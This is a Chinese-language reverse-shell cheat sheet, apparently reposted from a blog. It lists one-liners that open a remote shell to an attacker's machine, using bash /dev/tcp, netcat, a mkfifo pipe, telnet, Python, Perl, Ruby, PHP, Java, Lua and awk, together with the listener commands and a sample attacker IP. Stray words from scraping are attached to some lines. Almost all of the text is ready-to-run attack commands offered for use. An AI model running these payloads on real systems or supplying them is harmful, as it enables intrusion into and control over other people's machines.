原文连接请点击:https://ruoli-s.github.io/posts/b956.htmlphp
通用html
① 在kali机里面开启端口监听:java
nc -lvvp port //port 为攻击主机端口号,而且此端口号没有被占用
② 在目标主机上执行:python
bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号
③ 解释linux
bash -i: 打开一个交互的bashgit
.>&: 标准错误输出重定向到标准输出github
/dev/tcp/x.x.x.x/port : 意为调用socket,创建socket链接,其中x.x.x.x为要反弹到的主机ip,port为端口shell
0>&1: 标准输入重定向到标准输出,实现你与反弹出来的shell的交互ruby
/dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就至关于发出了一个socket调用,创建一个socket链接,读写这个文件就至关于在这个socket链接中传输数据。同理,Linux中还存在/dev/udp/。bash
④ 补充
linux shell下经常使用的文件描述符是:
- 标准输入 (stdin) :代码为 0 ,使用 < 或 << ;
- 标准输出 (stdout):代码为 1 ,使用 > 或 >> ;
- 标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>。
其余版本
exec 5<>/dev/tcp/x.x.x.x/9999 cat <&5 | while read line; do $line 2>&5 >&5; done
- 第一条命令:创建与x.x.x.x:9999的tcp链接,并将标准输入输出做为device 5的标准输入输出
- 第二条命令:cat <&5 获取device5的输入;
while read line; do $line 2>&5 >&5
一旦获取到命令便运行 而后将标准输入输出以及标准错误输出到device5中
① 在kali机里面开启端口监听:
nc -lvvp port //port 为攻击主机端口号,而且此端口号没有被占用 如:nc -lvvp 1234
② 在目标主机上执行:
nc -e /bin/bash 攻击主机ip port 如:nc -e /bin/bash 192.168.26.138 1234
③ 还可在目标主机上这样执行(不实用):
nc x.x.x.x 1234|/bin/bash|nc x.x.x.x 4321 //在攻击主机上打开两个终端,分别监听 1234 和 4321 端口,获得反弹shell后,1234 终端 输入命令, 4321 终端就会得到执行相应命令后的结果
④ 使用python语句进入交互式界面:
python -c 'import pty;pty.spawn("/bin/bash")'
在目标主机使用以下命令:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.26.138 1234 >/tmp/f
解释:
rm /tmp/f
删除命令mkfifo /tmp/f;
在tmp目录下写fifo文件f/bin/sh -i 2>&1
将/bin/sh 的标准错误重定向到标准输出nc x.x.x.x 2333 >/tmp/f
将nc监听到的输入 输入到fifo
① 在攻击主机上打开两个终端分别监听 1234 和 4321端口,(确保端口开放,而且不被占用),获得反弹shell后,1234 终端 输入命令, 4321 终端就会得到执行相应命令后的结果:
nc -lvvp 1234 nc -lvvp 4321
② 在目标主机上执行:
telnet 攻击主机ip 1234 | /bin/bash | telnet 攻击主机ip 4321
脚本是在目标主机上执行,其中 x.x.x.x 均为攻击主机ip,而且须要提早在攻击主机上进行监听相关端口.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
方法一:
perl -e 'use Socket;$i="x.x.x.x";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
方法二:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
php -r '$sock=fsockopen("x.x.x.x",5555);exec("/bin/bash -i <&3 >&3 2>&3");'
public class Revs { /** * @param args * @throws Exception */ public static void main(String[] args) throws Exception { // TODO Auto-generated method stub Runtime r = Runtime.getRuntime(); String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/5555;cat <&5 | while read line; do $line 2>&5 >&5; done"}; Process p = r.exec(cmd); p.waitFor(); } }
lua -e "require('socket');require('os');t=socket.tcp();t:connect('x.x.x.x','5555');os.execute('/bin/sh -i <&3 >&3 2>&3');"
注意:攻击的机器监听,在收到shell的时候不能够输入enter,否则会断开
awk 'BEGIN{s="/inet/tcp/0/x.x.x.x/8080";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
之后遇到了会再补充进去。
参考文献: